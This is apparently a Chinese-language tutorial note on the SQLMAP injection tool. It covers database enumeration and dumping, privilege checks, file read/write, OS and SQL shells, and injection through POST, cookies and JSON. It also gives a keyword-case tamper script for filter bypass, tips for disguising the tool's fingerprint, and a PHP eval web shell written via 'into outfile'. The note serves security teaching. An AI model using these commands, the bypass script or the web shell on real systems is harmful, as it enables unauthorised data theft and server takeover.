Day46:WEB攻防-注入工具&SQLMAP&Tamper编写&指纹修改&高权限操作&目录架构

目录

数据猜解-库表列数据&字典

权限操作-文件&命令&交互式

提交方法-POST&HEAD&JSON

绕过模块-Tamper脚本-使用&开发

分析拓展-代理&调试&指纹&风险&等级


知识点:
1、注入工具-SQLMAP-常规猜解&字典配置

2、注入工具-SQLMAP-权限操作&文件命令

3、注入工具-SQLMAP-Tamper&使用&开发

4、注入工具-SQLMAP-调试指纹&风险等级

参考文章:https://www.cnblogs.com/bmjoker/p/9326258.html

数据猜解-库表列数据&字典

测试:http://vulnweb.com/

--current-db

--tables -D ""

--columns -T "" -D ""

--dump -C "" -C "" -T ""

权限操作-文件&命令&交互式

引出权限:
--is-dba --privileges

引出文件:

--file-read --file-write --file-dest

引出命令:

--os-cmd= --os-shell --sql-shell

测试:MYSQL高权限注入

查看权限是否是管理员:--is-dba

文件读写:--file-read(文件读取命令,相当于使用load_file函数)

这两个命令一般一起使用:

--file-write 写入本地文件

--file-dest 要写入的文件绝对路径

命令执行:--os-cmd= whoami(需要知道语言及网站绝对路径才行)

然后路径什么一路回车看结果就行

--os-shell(获取系统交互shell,需要知道语言及网站绝对路径才行)

选项默认回车就行

--sql-shell(执行数据库命令,必须要用到select,也可以配合into outfile函数)

select "<?php @eval($_POST[1]);?>" into outfile "xxx/you.php";

提交方法-POST&HEAD&JSON

Post方式注入:--data ""

Cookie方式注入:--cookie ""

Json方式注入:-r 1.txt (推荐,该方法通杀全部提交方式)在txt里要注入的地方加上*号就是告诉工具在这里注入,不加*就是让工具对整个数据包参数进行测试

绕过模块-Tamper脚本-使用&开发

测试:base64注入 有过滤的注入

python 复制代码
--tamper=test.py  //简单绕过脚本
from lib.core.enums import PRIORITY
__priority__ = PRIORITY.LOW
def dependencies():
    pass
def tamper(payload, **kwargs):
    if payload:      
        payload = payload.replace('SELECT','sElEct')
        payload = payload.replace('OR','Or')
        payload = payload.replace('AND','And')
        payload = payload.replace('SLEEP','SleeP')
        payload = payload.replace('ELT','Elt')
    return payload

分析拓展-代理&调试&指纹&风险&等级

后期分析调试

-v=(0-6) #详细的等级(0-6)

--proxy "http://xx:xx" #代理注入

打乱默认指纹

python 复制代码
--user-agent ""  #自定义user-agent
--random-agent   #随机user-agent
--delay (设定两个HTTP请求的间隔时间,默认是没有任何间隔)

使用更多的测试

测试Header注入

python 复制代码
--level=(1-5) #要执行的测试水平等级(测试深度),默认为1 
--risk=(0-3)  #测试执行的风险等级,默认为1 
相关推荐
无泡汽水5 小时前
漏洞检测工具:Swagger UI敏感信息泄露
python·web安全
WTT001111 小时前
2024楚慧杯WP
大数据·运维·网络·安全·web安全·ctf
黑客Jack15 小时前
防御 XSS 的七条原则
安全·web安全·xss
东方隐侠安全团队-千里15 小时前
网安瞭望台第17期:Rockstar 2FA 故障催生 FlowerStorm 钓鱼即服务扩张现象剖析
网络·chrome·web安全
Mitch31117 小时前
【漏洞复现】CVE-2021-45788 SQL Injection
sql·web安全·docker·prometheus·metersphere
网络安全King17 小时前
网络安全 - SQL Injection
sql·web安全·php
m0_7482370519 小时前
2024年“羊城杯”粤港澳大湾区网络安全大赛 初赛 Web&数据安全&AI 题解WriteUp
前端·安全·web安全
hwscom19 小时前
如何永久解决Apache Struts文件上传漏洞
java·服务器·struts·web安全·apache
网络安全(华哥)19 小时前
X-Forwarded-For注入漏洞
windows·安全·web安全